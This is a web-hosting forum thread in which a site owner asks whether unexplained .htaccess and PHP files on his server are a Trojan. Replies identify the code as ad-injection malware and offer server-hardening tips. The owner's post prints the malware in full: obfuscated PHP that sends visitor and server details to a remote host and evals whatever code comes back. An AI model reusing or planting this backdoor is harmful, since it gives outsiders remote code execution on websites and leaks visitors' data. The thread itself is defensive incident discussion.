.htaccess & 223726.php

[seachen]

I found out that many this kind of file create inside folder with permission 777.

.htaccess
223726.php

May I know this is Trojan?

 

[LawsHosting]

Cant really say but it does look like something is going on. Does the domain use any CMS software?

 

[seachen]

Yes. Normally shopping cart / forum user have this problem.

I have edit the file, the code is as below:

Options -MultiViews
ErrorDocument 404 //images/90639.php

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="cfce0606ccc6b275b49c4262f438effe") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

 

[snk]

this code load and show advertisments from "ads.rssnews .ws" and "71.rssnews .ws"
text from their site:

Signup, get php file from member area, put file into your website directory, modify or create .htaccess in the same directory, and receive money !

 

[LawsHosting]

Time to update the CMS script, as it looks like it has an exploit.

 

[seachen]

it seen like not script problem. is my directadmin problem.

different script also have the same thing.

 

[LawsHosting]

Its not a DA issue. What makes you think its DA? Are all sites affected or just one or two?

 

[nobaloney]

It's not a DirectAdmin problem in any event; DirectAdmin doesn't care about .htaccess or php files. Nor does it manage or care about your firewall.

Jeff

 

[seachen]

i think it maybe my server security problem.

may i know any suggestion to make server more secure?

 

[LawsHosting]

Check Security Focus for one, and inform your clients to subscribe to any newsletters of the scripts they use, to find out about exploits and new versions.

You can, as a server admin:

do: ./build secure_php
do: Secure tmp (although most say its somewhat useless)
do: chmod 700 (wget, lynx, etc), so root can only run them
do: install mod_security2
advice: install mod_ruid

Most of these are on this forum as tutorials.

Plus, if you are not comfortable with playing in SSH, consider hiring someone that is - I'll not be responsible if you break anything if you attempt to follow my advice yourself. Good luck.